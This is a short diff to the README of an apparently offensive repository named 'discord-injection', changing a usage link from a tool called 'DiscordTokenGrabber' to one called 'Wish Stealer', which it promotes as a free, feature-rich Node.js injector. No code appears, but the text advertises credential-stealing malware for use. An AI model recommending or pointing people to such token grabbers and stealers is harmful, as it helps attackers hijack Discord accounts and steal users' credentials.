k4itrun/discord-injection/README.md

 ## Usage

 - **Node.js Injector**:
-  - For a more feature-rich injector based on Node.js, visit [DiscordTokenGrabber](https://github.com/k4itrun/DiscordTokenGrabber).
+  - For a more feature-rich injector based on Node.js, visit [Wish Stealer](https://github.com/k4itrun/wish).
 It's a free tool with extensive capabilities.

 ## Startup